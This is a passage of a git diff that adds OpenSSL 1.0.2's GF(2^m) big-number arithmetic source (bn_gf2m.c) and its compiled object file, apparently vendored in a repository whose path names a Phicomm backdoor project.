+                for (i = 0; i < top - 1; i++) {
+                    u1 = udp[i + 1];
+                    udp[i] = ((u0 >> 1) | (u1 << (BN_BITS2 - 1))) & BN_MASK2;
+                    u0 = u1;
+                    b1 = bdp[i + 1] ^ (p->d[i + 1] & mask);
+                    bdp[i] = ((b0 >> 1) | (b1 << (BN_BITS2 - 1))) & BN_MASK2;
+                    b0 = b1;
+                }
+                udp[i] = u0 >> 1;
+                bdp[i] = b0 >> 1;
+                ubits--;
+            }
+
+            if (ubits <= BN_BITS2 && udp[0] == 1)
+                break;
+
+            if (ubits < vbits) {
+                i = ubits;
+                ubits = vbits;
+                vbits = i;
+                tmp = u;
+                u = v;
+                v = tmp;
+                tmp = b;
+                b = c;
+                c = tmp;
+                udp = vdp;
+                vdp = v->d;
+                bdp = cdp;
+                cdp = c->d;
+            }
+            for (i = 0; i < top; i++) {
+                udp[i] ^= vdp[i];
+                bdp[i] ^= cdp[i];
+            }
+            if (ubits == vbits) {
+                BN_ULONG ul;
+                int utop = (ubits - 1) / BN_BITS2;
+
+                while ((ul = udp[utop]) == 0 && utop)
+                    utop--;
+                ubits = utop * BN_BITS2 + BN_num_bits_word(ul);
+            }
+        }
+        bn_correct_top(b);
+    }
+# endif
+
+    if (!BN_copy(r, b))
+        goto err;
+    bn_check_top(r);
+    ret = 1;
+
+ err:
+# ifdef BN_DEBUG                /* BN_CTX_end would complain about the
+                                 * expanded form */
+    bn_correct_top(c);
+    bn_correct_top(u);
+    bn_correct_top(v);
+# endif
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+/*
+ * Invert xx, reduce modulo p, and store the result in r. r could be xx.
+ * This function calls down to the BN_GF2m_mod_inv implementation; this
+ * wrapper function is only provided for convenience; for best performance,
+ * use the BN_GF2m_mod_inv function.
+ */
+int BN_GF2m_mod_inv_arr(BIGNUM *r, const BIGNUM *xx, const int p[],
+                        BN_CTX *ctx)
+{
+    BIGNUM *field;
+    int ret = 0;
+
+    bn_check_top(xx);
+    BN_CTX_start(ctx);
+    if ((field = BN_CTX_get(ctx)) == NULL)
+        goto err;
+    if (!BN_GF2m_arr2poly(p, field))
+        goto err;
+
+    ret = BN_GF2m_mod_inv(r, xx, field, ctx);
+    bn_check_top(r);
+
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+# ifndef OPENSSL_SUN_GF2M_DIV
+/*
+ * Divide y by x, reduce modulo p, and store the result in r. r could be x
+ * or y, x could equal y.
+ */
+int BN_GF2m_mod_div(BIGNUM *r, const BIGNUM *y, const BIGNUM *x,
+                    const BIGNUM *p, BN_CTX *ctx)
+{
+    BIGNUM *xinv = NULL;
+    int ret = 0;
+
+    bn_check_top(y);
+    bn_check_top(x);
+    bn_check_top(p);
+
+    BN_CTX_start(ctx);
+    xinv = BN_CTX_get(ctx);
+    if (xinv == NULL)
+        goto err;
+
+    if (!BN_GF2m_mod_inv(xinv, x, p, ctx))
+        goto err;
+    if (!BN_GF2m_mod_mul(r, y, xinv, p, ctx))
+        goto err;
+    bn_check_top(r);
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+# else
+/*
+ * Divide y by x, reduce modulo p, and store the result in r. r could be x
+ * or y, x could equal y. Uses algorithm Modular_Division_GF(2^m) from
+ * Chang-Shantz, S.  "From Euclid's GCD to Montgomery Multiplication to the
+ * Great Divide".
+ */
+int BN_GF2m_mod_div(BIGNUM *r, const BIGNUM *y, const BIGNUM *x,
+                    const BIGNUM *p, BN_CTX *ctx)
+{
+    BIGNUM *a, *b, *u, *v;
+    int ret = 0;
+
+    bn_check_top(y);
+    bn_check_top(x);
+    bn_check_top(p);
+
+    BN_CTX_start(ctx);
+
+    a = BN_CTX_get(ctx);
+    b = BN_CTX_get(ctx);
+    u = BN_CTX_get(ctx);
+    v = BN_CTX_get(ctx);
+    if (v == NULL)
+        goto err;
+
+    /* reduce x and y mod p */
+    if (!BN_GF2m_mod(u, y, p))
+        goto err;
+    if (!BN_GF2m_mod(a, x, p))
+        goto err;
+    if (!BN_copy(b, p))
+        goto err;
+
+    while (!BN_is_odd(a)) {
+        if (!BN_rshift1(a, a))
+            goto err;
+        if (BN_is_odd(u))
+            if (!BN_GF2m_add(u, u, p))
+                goto err;
+        if (!BN_rshift1(u, u))
+            goto err;
+    }
+
+    do {
+        if (BN_GF2m_cmp(b, a) > 0) {
+            if (!BN_GF2m_add(b, b, a))
+                goto err;
+            if (!BN_GF2m_add(v, v, u))
+                goto err;
+            do {
+                if (!BN_rshift1(b, b))
+                    goto err;
+                if (BN_is_odd(v))
+                    if (!BN_GF2m_add(v, v, p))
+                        goto err;
+                if (!BN_rshift1(v, v))
+                    goto err;
+            } while (!BN_is_odd(b));
+        } else if (BN_abs_is_word(a, 1))
+            break;
+        else {
+            if (!BN_GF2m_add(a, a, b))
+                goto err;
+            if (!BN_GF2m_add(u, u, v))
+                goto err;
+            do {
+                if (!BN_rshift1(a, a))
+                    goto err;
+                if (BN_is_odd(u))
+                    if (!BN_GF2m_add(u, u, p))
+                        goto err;
+                if (!BN_rshift1(u, u))
+                    goto err;
+            } while (!BN_is_odd(a));
+        }
+    } while (1);
+
+    if (!BN_copy(r, u))
+        goto err;
+    bn_check_top(r);
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+# endif
+
+/*
+ * Divide yy by xx, reduce modulo p, and store the result in r. r could be xx
+ * * or yy, xx could equal yy. This function calls down to the
+ * BN_GF2m_mod_div implementation; this wrapper function is only provided for
+ * convenience; for best performance, use the BN_GF2m_mod_div function.
+ */
+int BN_GF2m_mod_div_arr(BIGNUM *r, const BIGNUM *yy, const BIGNUM *xx,
+                        const int p[], BN_CTX *ctx)
+{
+    BIGNUM *field;
+    int ret = 0;
+
+    bn_check_top(yy);
+    bn_check_top(xx);
+
+    BN_CTX_start(ctx);
+    if ((field = BN_CTX_get(ctx)) == NULL)
+        goto err;
+    if (!BN_GF2m_arr2poly(p, field))
+        goto err;
+
+    ret = BN_GF2m_mod_div(r, yy, xx, field, ctx);
+    bn_check_top(r);
+
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+/*
+ * Compute the bth power of a, reduce modulo p, and store the result in r.  r
+ * could be a. Uses simple square-and-multiply algorithm A.5.1 from IEEE
+ * P1363.
+ */
+int BN_GF2m_mod_exp_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                        const int p[], BN_CTX *ctx)
+{
+    int ret = 0, i, n;
+    BIGNUM *u;
+
+    bn_check_top(a);
+    bn_check_top(b);
+
+    if (BN_is_zero(b))
+        return (BN_one(r));
+
+    if (BN_abs_is_word(b, 1))
+        return (BN_copy(r, a) != NULL);
+
+    BN_CTX_start(ctx);
+    if ((u = BN_CTX_get(ctx)) == NULL)
+        goto err;
+
+    if (!BN_GF2m_mod_arr(u, a, p))
+        goto err;
+
+    n = BN_num_bits(b) - 1;
+    for (i = n - 1; i >= 0; i--) {
+        if (!BN_GF2m_mod_sqr_arr(u, u, p, ctx))
+            goto err;
+        if (BN_is_bit_set(b, i)) {
+            if (!BN_GF2m_mod_mul_arr(u, u, a, p, ctx))
+                goto err;
+        }
+    }
+    if (!BN_copy(r, u))
+        goto err;
+    bn_check_top(r);
+    ret = 1;
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+/*
+ * Compute the bth power of a, reduce modulo p, and store the result in r.  r
+ * could be a. This function calls down to the BN_GF2m_mod_exp_arr
+ * implementation; this wrapper function is only provided for convenience;
+ * for best performance, use the BN_GF2m_mod_exp_arr function.
+ */
+int BN_GF2m_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
+                    const BIGNUM *p, BN_CTX *ctx)
+{
+    int ret = 0;
+    const int max = BN_num_bits(p) + 1;
+    int *arr = NULL;
+    bn_check_top(a);
+    bn_check_top(b);
+    bn_check_top(p);
+    if ((arr = (int *)OPENSSL_malloc(sizeof(int) * max)) == NULL)
+        goto err;
+    ret = BN_GF2m_poly2arr(p, arr, max);
+    if (!ret || ret > max) {
+        BNerr(BN_F_BN_GF2M_MOD_EXP, BN_R_INVALID_LENGTH);
+        goto err;
+    }
+    ret = BN_GF2m_mod_exp_arr(r, a, b, arr, ctx);
+    bn_check_top(r);
+ err:
+    if (arr)
+        OPENSSL_free(arr);
+    return ret;
+}
+
+/*
+ * Compute the square root of a, reduce modulo p, and store the result in r.
+ * r could be a. Uses exponentiation as in algorithm A.4.1 from IEEE P1363.
+ */
+int BN_GF2m_mod_sqrt_arr(BIGNUM *r, const BIGNUM *a, const int p[],
+                         BN_CTX *ctx)
+{
+    int ret = 0;
+    BIGNUM *u;
+
+    bn_check_top(a);
+
+    if (!p[0]) {
+        /* reduction mod 1 => return 0 */
+        BN_zero(r);
+        return 1;
+    }
+
+    BN_CTX_start(ctx);
+    if ((u = BN_CTX_get(ctx)) == NULL)
+        goto err;
+
+    if (!BN_set_bit(u, p[0] - 1))
+        goto err;
+    ret = BN_GF2m_mod_exp_arr(r, a, u, p, ctx);
+    bn_check_top(r);
+
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+/*
+ * Compute the square root of a, reduce modulo p, and store the result in r.
+ * r could be a. This function calls down to the BN_GF2m_mod_sqrt_arr
+ * implementation; this wrapper function is only provided for convenience;
+ * for best performance, use the BN_GF2m_mod_sqrt_arr function.
+ */
+int BN_GF2m_mod_sqrt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx)
+{
+    int ret = 0;
+    const int max = BN_num_bits(p) + 1;
+    int *arr = NULL;
+    bn_check_top(a);
+    bn_check_top(p);
+    if ((arr = (int *)OPENSSL_malloc(sizeof(int) * max)) == NULL)
+        goto err;
+    ret = BN_GF2m_poly2arr(p, arr, max);
+    if (!ret || ret > max) {
+        BNerr(BN_F_BN_GF2M_MOD_SQRT, BN_R_INVALID_LENGTH);
+        goto err;
+    }
+    ret = BN_GF2m_mod_sqrt_arr(r, a, arr, ctx);
+    bn_check_top(r);
+ err:
+    if (arr)
+        OPENSSL_free(arr);
+    return ret;
+}
+
+/*
+ * Find r such that r^2 + r = a mod p.  r could be a. If no r exists returns
+ * 0. Uses algorithms A.4.7 and A.4.6 from IEEE P1363.
+ */
+int BN_GF2m_mod_solve_quad_arr(BIGNUM *r, const BIGNUM *a_, const int p[],
+                               BN_CTX *ctx)
+{
+    int ret = 0, count = 0, j;
+    BIGNUM *a, *z, *rho, *w, *w2, *tmp;
+
+    bn_check_top(a_);
+
+    if (!p[0]) {
+        /* reduction mod 1 => return 0 */
+        BN_zero(r);
+        return 1;
+    }
+
+    BN_CTX_start(ctx);
+    a = BN_CTX_get(ctx);
+    z = BN_CTX_get(ctx);
+    w = BN_CTX_get(ctx);
+    if (w == NULL)
+        goto err;
+
+    if (!BN_GF2m_mod_arr(a, a_, p))
+        goto err;
+
+    if (BN_is_zero(a)) {
+        BN_zero(r);
+        ret = 1;
+        goto err;
+    }
+
+    if (p[0] & 0x1) {           /* m is odd */
+        /* compute half-trace of a */
+        if (!BN_copy(z, a))
+            goto err;
+        for (j = 1; j <= (p[0] - 1) / 2; j++) {
+            if (!BN_GF2m_mod_sqr_arr(z, z, p, ctx))
+                goto err;
+            if (!BN_GF2m_mod_sqr_arr(z, z, p, ctx))
+                goto err;
+            if (!BN_GF2m_add(z, z, a))
+                goto err;
+        }
+
+    } else {                    /* m is even */
+
+        rho = BN_CTX_get(ctx);
+        w2 = BN_CTX_get(ctx);
+        tmp = BN_CTX_get(ctx);
+        if (tmp == NULL)
+            goto err;
+        do {
+            if (!BN_rand(rho, p[0], 0, 0))
+                goto err;
+            if (!BN_GF2m_mod_arr(rho, rho, p))
+                goto err;
+            BN_zero(z);
+            if (!BN_copy(w, rho))
+                goto err;
+            for (j = 1; j <= p[0] - 1; j++) {
+                if (!BN_GF2m_mod_sqr_arr(z, z, p, ctx))
+                    goto err;
+                if (!BN_GF2m_mod_sqr_arr(w2, w, p, ctx))
+                    goto err;
+                if (!BN_GF2m_mod_mul_arr(tmp, w2, a, p, ctx))
+                    goto err;
+                if (!BN_GF2m_add(z, z, tmp))
+                    goto err;
+                if (!BN_GF2m_add(w, w2, rho))
+                    goto err;
+            }
+            count++;
+        } while (BN_is_zero(w) && (count < MAX_ITERATIONS));
+        if (BN_is_zero(w)) {
+            BNerr(BN_F_BN_GF2M_MOD_SOLVE_QUAD_ARR, BN_R_TOO_MANY_ITERATIONS);
+            goto err;
+        }
+    }
+
+    if (!BN_GF2m_mod_sqr_arr(w, z, p, ctx))
+        goto err;
+    if (!BN_GF2m_add(w, z, w))
+        goto err;
+    if (BN_GF2m_cmp(w, a)) {
+        BNerr(BN_F_BN_GF2M_MOD_SOLVE_QUAD_ARR, BN_R_NO_SOLUTION);
+        goto err;
+    }
+
+    if (!BN_copy(r, z))
+        goto err;
+    bn_check_top(r);
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    return ret;
+}
+
+/*
+ * Find r such that r^2 + r = a mod p.  r could be a. If no r exists returns
+ * 0. This function calls down to the BN_GF2m_mod_solve_quad_arr
+ * implementation; this wrapper function is only provided for convenience;
+ * for best performance, use the BN_GF2m_mod_solve_quad_arr function.
+ */
+int BN_GF2m_mod_solve_quad(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                           BN_CTX *ctx)
+{
+    int ret = 0;
+    const int max = BN_num_bits(p) + 1;
+    int *arr = NULL;
+    bn_check_top(a);
+    bn_check_top(p);
+    if ((arr = (int *)OPENSSL_malloc(sizeof(int) * max)) == NULL)
+        goto err;
+    ret = BN_GF2m_poly2arr(p, arr, max);
+    if (!ret || ret > max) {
+        BNerr(BN_F_BN_GF2M_MOD_SOLVE_QUAD, BN_R_INVALID_LENGTH);
+        goto err;
+    }
+    ret = BN_GF2m_mod_solve_quad_arr(r, a, arr, ctx);
+    bn_check_top(r);
+ err:
+    if (arr)
+        OPENSSL_free(arr);
+    return ret;
+}
+
+/*
+ * Convert the bit-string representation of a polynomial ( \sum_{i=0}^n a_i *
+ * x^i) into an array of integers corresponding to the bits with non-zero
+ * coefficient.  Array is terminated with -1. Up to max elements of the array
+ * will be filled.  Return value is total number of array elements that would
+ * be filled if array was large enough.
+ */
+int BN_GF2m_poly2arr(const BIGNUM *a, int p[], int max)
+{
+    int i, j, k = 0;
+    BN_ULONG mask;
+
+    if (BN_is_zero(a))
+        return 0;
+
+    for (i = a->top - 1; i >= 0; i--) {
+        if (!a->d[i])
+            /* skip word if a->d[i] == 0 */
+            continue;
+        mask = BN_TBIT;
+        for (j = BN_BITS2 - 1; j >= 0; j--) {
+            if (a->d[i] & mask) {
+                if (k < max)
+                    p[k] = BN_BITS2 * i + j;
+                k++;
+            }
+            mask >>= 1;
+        }
+    }
+
+    if (k < max) {
+        p[k] = -1;
+        k++;
+    }
+
+    return k;
+}
+
+/*
+ * Convert the coefficient array representation of a polynomial to a
+ * bit-string.  The array must be terminated by -1.
+ */
+int BN_GF2m_arr2poly(const int p[], BIGNUM *a)
+{
+    int i;
+
+    bn_check_top(a);
+    BN_zero(a);
+    for (i = 0; p[i] != -1; i++) {
+        if (BN_set_bit(a, p[i]) == 0)
+            return 0;
+    }
+    bn_check_top(a);
+
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_gf2m.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_gf2m.o
new file mode 100644
index 0000000000000000000000000000000000000000..54e9db1c8704bc5d6ba5ab256375de8398fab56b
GIT binary patch
literal 14824
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
